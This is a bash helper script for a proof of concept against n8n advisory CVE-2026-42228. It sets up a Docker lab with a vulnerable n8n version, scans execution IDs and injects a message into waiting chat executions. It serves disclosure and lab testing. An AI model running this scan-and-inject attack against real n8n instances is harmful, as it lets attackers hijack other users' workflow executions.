#!/usr/bin/env bash
# ──────────────────────────────────────────────────────────────────────────────
# exploit.sh — one-shot helper for GHSA-f77h-j2v7-g6mw
#
# Usage:
#   ./exploit.sh setup              # pull images, build PoC, start n8n target
#   ./exploit.sh scan               # scan exec IDs 1-200 with default payload
#   ./exploit.sh scan 1 500         # scan a custom range
#   ./exploit.sh attack <exec-id>   # attack a specific execution ID
#   ./exploit.sh attack <exec-id> "custom payload"
#   ./exploit.sh logs               # tail n8n target logs
#   ./exploit.sh clean              # stop & remove everything
# ──────────────────────────────────────────────────────────────────────────────
set -euo pipefail

TARGET_INTERNAL="http://n8n-vuln:5678"
TARGET_LOCAL="http://localhost:5678"
DEFAULT_PAYLOAD="[CVE-2026-42228] hijacked by PoC"

usage() {
  grep '^#' "$0" | grep -v '#!/' | sed 's/^# \?//'
  exit 1
}

require() {
  command -v "$1" &>/dev/null || { echo "[!] '$1' not found in PATH"; exit 1; }
}

require docker

cmd="${1:-}"

case "$cmd" in

  setup)
    echo "[*] Pulling vulnerable n8n image (1.123.22) ..."
    docker compose pull n8n-vuln
    echo "[*] Building attacker image ..."
    docker compose build poc
    echo "[*] Starting vulnerable n8n target ..."
    docker compose up -d n8n-vuln
    echo ""
    echo "[*] Waiting for n8n to become healthy ..."
    until docker inspect --format='{{.State.Health.Status}}' n8n-vuln 2>/dev/null | grep -q healthy; do
      printf '.'
      sleep 2
    done
    echo ""
    echo "[+] n8n is up at $TARGET_LOCAL"
    echo ""
    echo "    Next steps:"
    echo "    1. Open $TARGET_LOCAL and complete the setup wizard"
    echo "    2. Create a workflow with a Chat trigger node"
    echo "    3. Set the Chat trigger Auth = None and activate the workflow"
    echo "    4. Open the Chat and send a message to put the execution in 'waiting' state"
    echo "    5. Run:  ./exploit.sh scan"
    ;;

  scan)
    START="${2:-1}"
    END="${3:-200}"
    echo "[*] Scanning execution IDs $START → $END against $TARGET_INTERNAL"
    docker compose run --rm poc \
      --target "$TARGET_INTERNAL" \
      --start-id "$START" \
      --end-id   "$END" \
      --inject   "$DEFAULT_PAYLOAD"
    ;;

  attack)
    EXEC_ID="${2:?'Usage: ./exploit.sh attack <exec-id> [payload]'}"
    PAYLOAD="${3:-$DEFAULT_PAYLOAD}"
    echo "[*] Attacking execution $EXEC_ID ..."
    docker compose run --rm poc \
      --target  "$TARGET_INTERNAL" \
      --exec-id "$EXEC_ID" \
      --inject  "$PAYLOAD"
    ;;

  logs)
    docker compose logs -f n8n-vuln
    ;;

  clean)
    echo "[*] Stopping and removing lab containers, network, and volumes ..."
    docker compose down -v
    echo "[+] Done."
    ;;

  *)
    usage
    ;;
esac